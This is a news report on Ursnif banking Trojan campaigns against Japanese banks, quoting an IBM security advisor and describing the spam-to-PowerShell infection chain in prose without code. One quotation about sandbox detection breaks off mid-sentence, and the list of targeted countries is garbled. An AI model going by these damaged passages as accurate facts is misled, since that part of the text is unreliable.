Japan Banks Constantly Being Harassed by Trojan Campaigns

Japan Banks Constantly Being Harassed by Trojan Campaigns

According to security experts, two months ago, the financial sector of Japan started to experience a great surge in cyber-attacks.

Japan’s financial sector has been experiencing an increased amount of attacks since September, which has prompted Japanese payment card providers and banks to strengthen their means of security against attacks.

IBM’s executive security advisor Limor Kessem, expressed his findings on October, 26, through a blog post in which he wrote: “Ursnif (aka Gozi) banking Trojan was the most active malware code in the financial sector in 2016 and 2017.”

The group of cybercriminals currently running the malicious Ursnif banking Trojan has increased the number of attacks performed against Japan, including a step-up in their spam campaign to deliver malware, according to experts in cybersecurity. In addition, experts from IBM’s X-Force team have told the news that hackers have been performing Trojan campaigns, such as Ursnif against several countries, including North, America, Europe, Australia, Japan and North Korea.

Ursnif has also been targeting banks in Poland, Bulgaria, Czech Republic and Spain in 2017. According to experts, Japan has been suffering active attacks from the malware for five years.

“One of its (Ursnif) most popular targets in 2017 has been Japanese banks,” Kessem said. He further added, “In terms of targets, Ursnif malware configurations can be a mixed bag at times, but those targeting Japan are specific to banks and payment card providers in the country,” he also stated that given that the list of targets has remained without modifications across all campaigns, the same hackers are probably behind it.

Nonetheless, many experts have warned that hackers have extended their range of actions to “target access data for cloud storage, cryptocurrency exchange platforms, e-commerce sites, and local email.” The methods used by the group of cybercriminals to aim Japanese users include web-injection attacks, page redirections, and data grabbing from secure sessions.

Kessem also wrote in his blog post “users receive an HTML link that leads to an archive (.zip) file containing JavaScript, which launches a PowerShell script that fetches the payload from a remote server and infects the user with Ursnif.” And also manifested the reason why the malware was elusive of sandbox detection “Sandbox detection has not been very successful as

Kessem also expressed that the history of organized cybercrime in Japan does not have a long history. “In most cases of malware migration, cybercriminal groups with adequate resources are looking for easier money, less security and an element of surprise for users who are less accustomed to their spam ploys and social engineering during the banking session,” he wrote.

“Even on the internet, gangs often stick to their own turf,” which explains why larger cybercriminal associations have stayed away from Japan, “Organized groups need connections with local money-laundering and cybercrime groups, which help explain why other organized groups such as Dridex and TrickBot, both of which target banks in as many as 40 countries have largely stayed away from Japan,” the report said.